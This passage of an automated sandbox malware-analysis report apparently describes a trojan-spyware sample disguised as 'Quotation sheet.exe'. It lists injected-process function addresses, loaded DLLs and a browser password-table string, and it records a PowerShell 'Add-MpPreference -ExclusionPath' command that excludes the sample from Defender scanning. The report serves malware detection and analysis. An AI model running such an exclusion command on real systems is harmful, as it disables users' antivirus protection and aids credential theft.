                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05341F927_2_05341F92
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05303FD27_2_05303FD2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05303FD57_2_05303FD5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05349EB07_2_05349EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D59107_2_053D5910
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053499507_2_05349950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535B9507_2_0535B950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AD8007_2_053AD800
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053438E07_2_053438E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FFB767_2_053FFB76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535FB807_2_0535FB80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B5BF07_2_053B5BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0537DBF97_2_0537DBF9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B3A6C7_2_053B3A6C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FFA497_2_053FFA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F7A467_2_053F7A46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DDAAC7_2_053DDAAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05385AA07_2_05385AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E1AA37_2_053E1AA3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EDAC67_2_053EDAC6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050905919_2_05090591
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050744209_2_05074420
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050824469_2_05082446
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD05359_2_04FD0535
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0507E4F69_2_0507E4F6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FEC6E09_2_04FEC6E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FCC7C09_2_04FCC7C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD07709_2_04FD0770
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FF47509_2_04FF4750
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0506A1189_2_0506A118
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050581589_2_05058158
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050901AA9_2_050901AA
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050841A29_2_050841A2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050881CC9_2_050881CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050620009_2_05062000
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FC01009_2_04FC0100
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508A3529_2_0508A352
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050903E69_2_050903E6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FDE3F09_2_04FDE3F0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050702749_2_05070274
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050502C09_2_050502C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FC0CF29_2_04FC0CF2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0506CD1F9_2_0506CD1F
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD0C009_2_04FD0C00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FCADE09_2_04FCADE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FE8DBF9_2_04FE8DBF
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05070CB59_2_05070CB5
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FDAD009_2_04FDAD00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05012F289_2_05012F28
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05072F309_2_05072F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05044F409_2_05044F40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FE2E909_2_04FE2E90
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD0E599_2_04FD0E59
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0504EFA09_2_0504EFA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FDCFE09_2_04FDCFE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508EE269_2_0508EE26
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FC2FC89_2_04FC2FC8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508CE939_2_0508CE93
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FF0F309_2_04FF0F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508EEDB9_2_0508EEDB
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FFE8F09_2_04FFE8F0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FB68B89_2_04FB68B8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0509A9A69_2_0509A9A6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD28409_2_04FD2840
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FDA8409_2_04FDA840
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD29A09_2_04FD29A0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FE69629_2_04FE6962
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508AB409_2_0508AB40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FCEA809_2_04FCEA80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05086BD79_2_05086BD7
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050875719_2_05087571
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FC14609_2_04FC1460
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0506D5B09_2_0506D5B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050995C39_2_050995C3
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508F43F9_2_0508F43F
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508F7B09_2_0508F7B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050156309_2_05015630
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050816CC9_2_050816CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD70C09_2_04FD70C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0509B16B9_2_0509B16B
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0500516C9_2_0500516C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FDB1B09_2_04FDB1B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FBF1729_2_04FBF172
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0507F0CC9_2_0507F0CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050870E99_2_050870E9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508F0E09_2_0508F0E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508132D9_2_0508132D
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FEB2C09_2_04FEB2C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD52A09_2_04FD52A0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0501739A9_2_0501739A
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FBD34C9_2_04FBD34C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050712ED9_2_050712ED
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05081D5A9_2_05081D5A
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05087D739_2_05087D73
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05049C329_2_05049C32
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FEFDC09_2_04FEFDC0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD3D409_2_04FD3D40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508FCF29_2_0508FCF2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508FF099_2_0508FF09
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD9EB09_2_04FD9EB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508FFB19_2_0508FFB1
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F93FD29_2_04F93FD2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F93FD59_2_04F93FD5
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD1F929_2_04FD1F92
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050659109_2_05065910
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD38E09_2_04FD38E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0503D8009_2_0503D800
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD99509_2_04FD9950
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FEB9509_2_04FEB950
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508FB769_2_0508FB76
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05045BF09_2_05045BF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0500DBF99_2_0500DBF9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508FA499_2_0508FA49
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05087A469_2_05087A46
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05043A6C9_2_05043A6C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FEFB809_2_04FEFB80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05015AA09_2_05015AA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05071AA39_2_05071AA3
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0506DAAC9_2_0506DAAC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0507DAC69_2_0507DAC6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D720809_2_02D72080
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D6CF609_2_02D6CF60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D6B2B09_2_02D6B2B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D6B2A49_2_02D6B2A4
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D6D1809_2_02D6D180
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D6B1609_2_02D6B160
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D757309_2_02D75730
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D739309_2_02D73930
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D8BE109_2_02D8BE10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539E6DC9_2_0539E6DC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539E3E49_2_0539E3E4
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539E2C89_2_0539E2C8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539D8139_2_0539D813
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539D8489_2_0539D848
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539CAE89_2_0539CAE8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 04FBB970 appears 280 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0503EA12 appears 86 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 05017E54 appears 111 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 05005130 appears 58 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0504F290 appears 105 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05375130 appears 58 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05387E54 appears 111 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0532B970 appears 280 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 053BF290 appears 105 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 053AEA12 appears 86 times
                      Source: Quotation sheet.exe, 00000000.00000002.2354177736.0000000005C50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000002.2358890483.0000000007B80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000002.2356806386.00000000065E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000002.2346401680.0000000004379000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000002.2346401680.0000000004379000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000002.2336603379.00000000014EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000000.2125533262.0000000000F92000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBCYJ.exe> vs Quotation sheet.exe
                      Source: Quotation sheet.exe Binary or memory string: OriginalFilenameBCYJ.exe> vs Quotation sheet.exe
                      Source: Quotation sheet.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Quotation sheet.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, PPUKR5wZS9CW8kiXFb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: _0020.SetAccessControl
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: _0020.AddAccessRule
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: _0020.SetAccessControl
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: _0020.AddAccessRule
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, PPUKR5wZS9CW8kiXFb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/7@12/9
                      Source: C:\Users\user\Desktop\Quotation sheet.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation sheet.exe.log
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjko1olp.jns.ps1
                      Source: Quotation sheet.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\Quotation sheet.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: pcaui.exe, 00000009.00000003.2642733866.00000000031DA000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3971801019.000000000322A000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3971801019.00000000031FB000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2642854553.00000000031FB000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2645125817.0000000003206000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Quotation sheet.exe ReversingLabs: Detection: 42%
                      Source: unknown Process created: C:\Users\user\Desktop\Quotation sheet.exe "C:\Users\user\Desktop\Quotation sheet.exe"
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe Process created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                      Source: C:\Windows\SysWOW64\pcaui.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: version.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: dwrite.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: textshaping.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: propsys.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: pcaui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wer.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winsqlite3.dllJump to behavior
